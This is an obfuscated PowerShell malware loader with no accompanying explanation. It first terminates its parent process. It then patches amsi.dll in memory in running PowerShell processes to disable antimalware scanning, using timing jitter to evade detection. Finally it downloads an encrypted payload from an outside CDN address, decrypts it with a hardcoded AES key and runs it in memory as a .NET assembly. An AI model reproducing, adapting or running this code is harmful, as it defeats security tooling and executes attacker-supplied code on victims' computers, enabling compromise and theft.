$yew = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId
if ($yew) { Stop-Process -Id $yew -Force }

Add-Type @"
using System;
using System.Runtime.InteropServices;
public class K {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint a, bool i, int p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w);
}
"@

function KJhbhb {
    Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
    $basin = Get-Process -Name "powershell" -ErrorAction SilentlyContinue
    if (!$basin) { exit 1 }
    
    foreach ($chasm in $basin) {
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $brook = [K]::OpenProcess(0x001F0FFF, $mead, $chasm.Id)
        $drift = $null
        $horizon = 0
        
        foreach ($wave in $chasm.Modules) {
            if ($wave.ModuleName -eq "amsi.dll") {
                $drift = $wave.BaseAddress
                $horizon = $wave.ModuleMemorySize
                break
            }
        }
        
        if (!$drift) { continue }
        
        $veil = [byte[]]::new(32)
        $sky = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b)
        $knoll = $null
        
        for ($apple = 0; $apple -le $horizon; $apple += 32) {
            $temple = [IntPtr]::Zero
            [K]::ReadProcessMemory($brook, [IntPtr]($drift.ToInt64() + $apple), $veil, 32, [ref]$temple)
            $cedar = $anchor
            for ($mist = 0; $mist -lt 32; $mist++) {
                if ($veil[$mist] -ne $sky[$mist]) { $cedar = $mead; break }
            }
            if ($cedar) { $knoll = [IntPtr]($drift.ToInt64() + $apple); break }
        }
        
        if (!$knoll) { continue }
        
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $quest = 0
        [K]::VirtualProtectEx($brook, $drift, 0x1000, 0x40, [ref]$quest)
        $willow = [byte[]]@(0x31,0xff,0x90)
        $rune = 0
        [K]::WriteProcessMemory($brook, [IntPtr]($knoll.ToInt64() + 0x1b), $willow, 3, [ref]$rune)
    }
}

KJhbhb

#ujhifsfiohdf
setx BUILD "Titan"
$house = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin"
$yarrow = [System.Net.WebClient]::new()
$stream = $yarrow.DownloadData($house)
$gorge = [System.Security.Cryptography.Aes]::Create()
$zebra = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0")
$wick = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY")
$gorge.Key = $zebra
$gorge.IV = $wick
$ledge = $gorge.CreateDecryptor()
$rim = $ledge.TransformFinalBlock($stream, 0, $stream.Length)
$sage = [System.Reflection.Assembly]::Load($rim)
$moor = $sage.EntryPoint
$moor.Invoke($null, $null)
#ujhifsfiohdf